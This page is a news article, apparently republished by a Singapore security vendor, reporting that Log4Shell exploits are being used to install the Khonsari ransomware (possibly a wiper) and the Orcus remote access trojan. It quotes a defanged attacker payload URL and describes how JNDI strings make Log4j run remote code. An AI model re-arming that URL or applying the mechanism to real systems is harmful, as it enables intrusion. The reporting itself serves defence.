Privacy Ninja



        • Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

New Ransomware Now Being Deployed in Log4Shell Attacks

New Ransomware Now Being Deployed in Log4Shell Attacks

The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.

Last Friday, a public exploit was released for a critical zero-day vulnerability named ‘Log4Shell’ in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications.

The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.

While this vulnerability was fixed in Log4j 2.15.0 and even tightened further in Log4j 2.16.0, it is being widely exploited by threat actors to install various malware, including coin miners, botnets, and even Cobalt Strike beacons.

Also Read: Does Personal Data Market About To Become The Next Big Thing

First Log4j exploit installing ransomware

Yesterday, BitDefender reported that they found the first ransomware family being installed directly via Log4Shell exploits.

The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class that is loaded and executed by the Log4j application.

Once loaded, it would download a .NET binary from the same server to install new ransomware [VirusTotal] named ‘Khonsari.’

This same name is also used as a the extension for encrypted files and in the ransom note, as shown below.

Khonsari ransom note
Khonsari ransom note

In later attacks, BitDefender noticed that this threat actor used the same server to distribute the Orcus Remote Access Trojan.

Also Read: Data Storage Security Standards: What Storage Professionals Need to Know

Likely a wiper

Ransomware expert Michael Gillespie told BleepingComputer that Khonsariuses valid encryption and is secure, meaning that it is not possible to recover files for free.

However, the ransom note has one oddity – it does not appear to include a way to contact the threat actor to pay a ransom.

Emsisoft analyst Brett Callow pointed out to BleepingComputer that the ransomware is named after and uses contact information for a Louisiana antique shop owner rather than the threat actor.

Therefore, it is unclear if that person is the actual victim of the ransomware attack or listed as a decoy.

Regardless of the reason, as it does not contain legitimate contact information for the threat actors, we believe this is a wiper rather than ransomware.

While this may be the first known instance of the Log4j exploit directly installing ransomware (wiper?), Microsoft has already seen the exploits used to deploy Cobalt Strike beacons.

Therefore, it is likely that more advanced ransomware operations are already using the exploits as part of their attacks.



Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection


We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.


Click one of our contacts below to chat on WhatsApp

× Chat with us